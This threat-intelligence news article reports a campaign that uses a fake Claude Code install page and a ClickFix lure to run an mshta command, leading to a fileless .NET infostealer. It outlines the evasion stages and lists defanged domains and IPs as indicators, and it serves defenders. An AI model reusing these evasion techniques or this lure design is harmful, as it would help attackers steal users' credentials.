Fake Claude Code Page Delivers Fileless .NET Infoste
Cybercriminals are exploiting the growing interest in AI coding tools, specifically targeting users searching for Claude Code installation guides. A recent campaign employs deceptive installer pages...
Cybercriminals are exploiting the growing interest in AI coding tools, specifically targeting users searching for Claude Code installation guides. A recent campaign employs deceptive installer pages to silently steal credentials from unsuspecting victims, a threat detailed in The attackers use SEO poisoning to push a spoofed Anthropic install page to the top of search results. Once a user lands there, the trap is set.
The campaign is designed for a very specific audience. Rather than targeting IT professionals, it goes after first-time developers and non-technical users excited about a new tool.
These users have no baseline for what a real installation process looks like, making them more likely to follow instructions without question. The delivery chain is six stages deep and almost entirely fileless after the first step.
Analysts from Cyderes, through their threat research unit Howler Cell, identified this active SEO poisoning campaign targeting users searching for Claude Code installation guides.
According to Cyderes report shared with Cyber Security News (CSN), attackers placed a spoofed Anthropic install page at the top of search results and used a ClickFix lure to execute a malicious MSHTA command via the Windows Run dialog.
The final payload is a reflective .NET infostealer that beacons to Russian infrastructure for credential exfiltration.
The consequences of a successful infection are serious. Stolen credentials, drained accounts, and compromised identities are among the real-world outcomes Howler Cell flagged in their analysis.
Many victims have no enterprise security controls between them and a spoofed download page. Anthropic is not compromised and its brand is simply being impersonated.
What makes this campaign stand out is the deliberate targeting logic. Operators tracked Claude Code’s rapid adoption and turned it into an attack surface.
The delivery chain was engineered to defeat file inspection, AMSI scanning, EDR telemetry, sandbox analysis, and IOC matching at every layer.
Hackers Use Fake Claude Code Install Page
The attack starts when a user searches for “Claude Code install” and clicks what looks like a legitimate Anthropic setup page.
The page instructs the visitor to open the Windows Run dialog and paste a pre-staged mshta.exe command, framed as a required step.
This is the ClickFix method, a social engineering technique that disguises attacker-controlled MSHTA commands as routine setup steps.
Stage 1 begins when mshta.exe retrieves a 6.7 MB MP3/HTA polyglot payload from download.version-516[.]com/claude.
This file passes as playable audio during security scans while hiding an executable HTA script block inside.
When mshta.exe processes the file, it skips the audio and runs the hidden script. Security tools inspecting the file header see a legitimate MP3, not a threat.
Stage 2 uses the HTA to register a scheduled task via a COM object, spawning a 32-bit PowerShell process. Targeting the 32-bit binary is intentional because EDR coverage is often weighted toward 64-bit activity.
The script performs an AMSI bypass, RC4 decryption, and victim fingerprinting via an MD5 hash of the machine and username. Stage 3 fetches a 17 MB obfuscated script in memory from a unique subdomain on oakenfjrod[.]ru, leaving nothing on disk.
Reflective .NET Infostealer: Fileless and Hard to Catch
The final stage is a reflective .NET infostealer that runs entirely within the existing PowerShell process address space. It leaves no file artifact, spawns no new process, and creates no image-load event for defenders to anchor on.
The loading method mirrors techniques used by advanced tools like Cobalt Strike, but executed fully from PowerShell.
The infostealer beacons over HTTPS to 185[.]177[.]239[.]255:443 for command and control and credential theft. SensitiveFileRead telemetry confirmed browser credential store access during execution.
EDR platforms with .NET assembly load visibility can detect this where file-based controls cannot. Defenders should treat any Claude Code install page prompting a Run dialog paste as a likely infection event.
Blocking mshta.exe outbound HTTPS connections covers Stage 1 regardless of obfuscation. DNS queries to any subdomain of oakenfjrod[.]ru are a strong compromise indicator, and wildcard domain blocking is far more effective than per-subdomain IOC matching.
Indicators of Compromise (IoCs):-
| Type | Indicator | Description |
|---|---|---|
| Domain | download.version-516[.]com | HTA payload delivery; fake Claude Code download site |
| Domain | oakenfjrod[.]ru | Stage 3 C2 (wildcard: *.oakenfjrod[.]ru) |
| IP | 185[.]177[.]239[.]255 | Final stealer C2 IP for credential exfiltration |
| URL | https://[md5_16char].oakenfjrod[.]ru/claude-[uuid] | Per-victim C2 beacon URL structure |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.
No Comment! Be the first one.